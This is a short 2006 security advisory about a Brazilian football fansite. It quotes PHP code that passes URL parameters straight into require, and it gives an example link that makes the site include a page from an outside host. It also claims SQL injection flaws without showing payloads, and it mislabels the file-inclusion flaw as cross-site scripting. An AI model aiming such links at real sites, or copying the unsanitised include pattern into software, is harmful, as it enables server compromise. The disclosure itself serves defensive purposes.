rubronegrodotnet.txt

`Author: Rephumos  
Date: 22.feb.2006  
URL: http://www.rubronegro.net  
  
  
  
--- Description:  
  
Rubronegro.net is a fansite for the brazilian soccer team Atlético Paranaense.  
  
  
  
--- Vulnerability - Cross scripting:  
  
Website has a cross site scripting issue, taken from the code below:  
  
$temp = $path."/".$link;  
require $temp;  
  
On the lines 40 and 41 of www.rubronegro.net/base3.php  
  
Example: The following link -  
http://www.rubronegro.net/base3.php?path=clube/baixada&link=patrimonio_hist  
Acesses the file patrimonio_hist (with no extension) in the clube/baixada foder.  
  
It can be easily changed to acces the last 100 advisories of Packet Storm security website, like this:  
http://www.rubronegro.net/base3.php?path=http://www.packetstormsecurity.org&link=advisories100.html  
  
The code enables the website to be processed as af it were in the server.  
  
  
  
--- Vulnerability - SQL Injection:  
  
The following files:  
base/config.lib.php  
base/function.lib.new.php  
  
are accessible with the information above and vulnerable to sql injections.  
  
  
  
--- Status:  
  
Vulnerability found: 10 feb 2006  
Vulnerability notified: 11 feb 2006  
Published after no response: 22 feb 2006  
  
  
--- Greetings:  
  
To my homies and all brazilian hackers around ;D`